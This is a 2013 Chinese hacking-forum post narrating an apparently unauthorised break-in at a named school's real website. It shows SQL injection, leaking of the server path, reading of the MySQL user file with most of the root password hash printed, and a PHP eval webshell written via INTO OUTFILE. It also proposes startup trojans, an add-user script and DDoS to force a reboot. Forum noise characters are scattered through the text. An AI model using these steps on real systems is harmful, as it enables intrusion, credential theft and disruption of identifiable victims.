找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2902|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏2 P2 g# e  I) e
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
3 s2 \  @( P; {7 R8 @- o6 X8 e/ i- Z/ W; E+ H) ^1 W, Z( ?& B

) ]6 |& X: O2 U- M2 N# z  ?3 H3 Y2 u  q2 l. j7 I. R
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 " o; ~  @# [2 e+ m) n) `

% U4 X$ H  N  T/ p% Y: D那么想可以直接写入shell ,getshell有几个条件:3 G7 A0 c) d: r# u" I6 ^( ^
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF+ u  ]% k  u8 _+ {
& X9 r  ~; ^# n5 J  A- j. [' e
试着爆绝对路径:
+ N: ?# v" A& s( y2 z1./phpMyAdmin/index.php?lang[]=1  ) x+ @; Z3 C" \* P& p( }1 E: K
2./phpMyAdmin/phpinfo.php  
$ n  ?3 t* ?' T4 H, o' B3./load_file()  * r6 \3 P4 q& s7 s
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  ! V4 c$ i  D7 h! m
5./phpmyadmin/libraries/select_lang.lib.php  " j  {' V5 X; A# _
6./phpmyadmin/libraries/lect_lang.lib.php  6 ^* g: S, Q5 g* Q* x: l8 o
7./phpmyadmin/libraries/mcrypt.lib.php   
- z! c" l+ K- I. c4 J, w  R/ C8./phpmyadmin/libraries/export/xls.php  $ P  ?. }* j* a- H
1 g' y$ V, \8 L8 |- S2 D
均不行...........................
3 b' g& Q7 l4 H$ e! P' `! [
" ?0 z1 g0 \7 C% x; c% J6 ^御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
0 l4 i# {! z! Z( y" A! g. E! L, q. @$ I0 S5 w% K% |
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 6 t  S8 R8 q0 ]
# I8 Y' m. N  X' J& Q, L
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败9 {& Y4 F1 [3 ~# h; G7 F  M

1 B9 U8 m7 e/ Q( I$ w+ e- j/ ^敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
: F# C# r1 C9 L& c$ @: P9 b5 B2 u$ ~% Q' o% N/ V8 b+ `
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ; e! a* t' a% H: \1 @/ V
$ d( F, N, [8 `/ R
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini # J) x& B: \4 s2 }& ]  q

4 h4 ?: j0 L5 G9 }( ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
( [& ?, ^! P& k" @3 s, g6 b; Q: m# ~5 i" O# W* G  L) m7 b
成功读到root密码:
- b7 N# J4 S. ~6 G; L& ]1 S+ i7 Y& c9 B) {% d. T- K, x# i5 _
17---- r(0072)% W: L, G- j1 a! H& F# k3 \0 D
18---- o(006f)% X( L* N* s# C' ~# p/ J0 T* |4 S  A
19---- o(006f)
! e* S3 ~* ^! {+ u: [2 O7 L8 U20---- t(0074)
; u# a# _  I+ P* o7 p2 n21---- *(002a)9 L+ W: e  h! X7 i- V
22---- 8(0038)
# u7 G& {: o; n& M7 S  d8 ]23---- 2(0032)# H$ R! {/ R# y
24---- E(0045)7 P4 j; Y5 B. h9 w: F! v. ?6 m$ I
25---- 1(0031)
9 Q' S7 [1 I3 n0 }26---- C(0043)
9 f/ o! g4 Z% E( Y27---- 5(0035)
6 \) D3 R/ V/ O# x28---- 8(0038)) h) t( x2 F1 Y6 c; s) f
29---- 2(0032)" M. P  t0 i( {( G2 Q. g! y% T
30---- 8(0038)0 d9 c! `$ p/ _4 I* ]
31---- A(0041)4 n, k+ w6 v+ O: c& ~! y
32---- 9(0039)
6 e# D+ R+ g8 k: b1 R33---- B(0042)* R, B5 B2 h9 [5 b7 [; d. d& X
34---- 5(0035); a: m, K' O8 i% m0 w; ?; E
35---- 4(0034)) E" i# f! P: p8 f! C" s
36---- 8(0038)
. ?  G! _0 n8 T( w0 S: ]: {37---- 6(0036)  c1 j; b5 L* X( H8 ^5 V' Z& c
38---- 4(0034)' c) E! v+ D; h' u$ l
39---- 9(0039)
# \/ K' l% C! s" f40---- 1(0031)
0 |" ]+ @, |7 D41---- 1(0031)
; U8 ?% F8 d: j. @# b/ |* Q% h42---- 5(0035)
) [/ i+ E# `; H43---- 3(0033)  ?: k: q7 Q9 u. l7 G
44---- 5(0035)% q+ J0 ^+ y0 L
45---- 9(0039)8 e' u) e& x8 y9 m) T2 r6 D
46---- 8(0038)8 I1 P4 L3 _1 D/ W) B
47---- F(0046)% p! v5 @% Y' ]# ~$ p4 k4 {, B
48---- F(0046)& A& n3 q, L, J. z
49---- 4(0034)& r/ h# ^: L( [! F% A* Z& q, M  x
50---- F(0046)
8 u/ Q! [5 w- O% {51---- 0(0030)
9 O- ~0 G/ J6 F52---- 3(0033)
: x) X6 F* r# s, x53---- 2(0032)
6 [- \% B- \3 S54---- A(0041)- g. |# W' d' S; h6 ^( S
55---- 4(0034)5 K, G( ^  ]2 s: p5 x. d
56---- A(0041)  t, @" T( K  K% |7 {: Q7 p
57---- B(0042)
4 {( V# J, Q# Y0 Y# H58---- *(0044)( Z5 p. i) Z4 ]; L6 E
59---- *(0035)
% l- O4 j; L6 s$ {2 S/ @  B1 E60---- *(0041)
4 ]0 G5 @& \) r3 e/ w61---- *0032)9 F! z1 A1 C/ J$ j# Z" s1 P4 q+ g
* S' ~0 v5 X( P+ r* K9 S
解密后成功登陆phpmyamin0 O( n0 Q: R( [) I9 n
                          
: M1 R1 ^( m5 t9 `
0 `" ~+ ?+ p, X' O* H$ i9 \                             : H+ k( ^/ H' o( e' x- n

" q- [* O2 a* n) p找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'% o" x* s- k$ |' g

% G+ X) ]3 h3 {/ C成功执行,拿下shell,菜刀连接:/ ]# }$ r" E0 G1 \5 `- e. }6 C

6 ~3 T: G6 Y( ^服务器不支持asp,aspx,php提权无果...................
  X  L  F8 g* J( D: _: J
, s1 m- w7 ?$ a2 [. C: y9 w; N但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:& |" L0 Z+ X. D. r9 R
服务器上已经有个隐藏帐号了

/ l  Q8 \0 J; H  y7 M7 H0 }/ l
别名     administrators
' P$ g$ ?8 A" B9 C- A注释     管理员对计算机/域有不受限制的完全访问权
7 ?- h  S' k' g. p( Q2 a8 q' f
成员
! m2 X7 `+ k' [/ L& P" R
-------------------------------------------------------------------------------; {) o8 s( d- M! P, {* n: w
admin
! D/ {0 A$ w* S% t/ s4 QAdministrator
% |  i! F, p0 sslipper$
# q+ I) i7 C. a6 @* wsqluser
$ u$ j, ~5 p1 Y. a& G; m" a命令成功完成。
/ w9 p! r  L, P
, B2 A" b& B; I1 T9 N$ Z服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
! A1 }1 \7 \0 u% q5 s$ S1 l
/ L0 d; ]  x& U; }/ A5 Xddos服务器重启,不然就只能坐等服务器重启了...............................
6 P- p# M$ [9 T
# Z* u5 A, D0 j( N! d5 `# c* Y0 H      

  m& f. x* p4 Q1 r% U' l9 C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表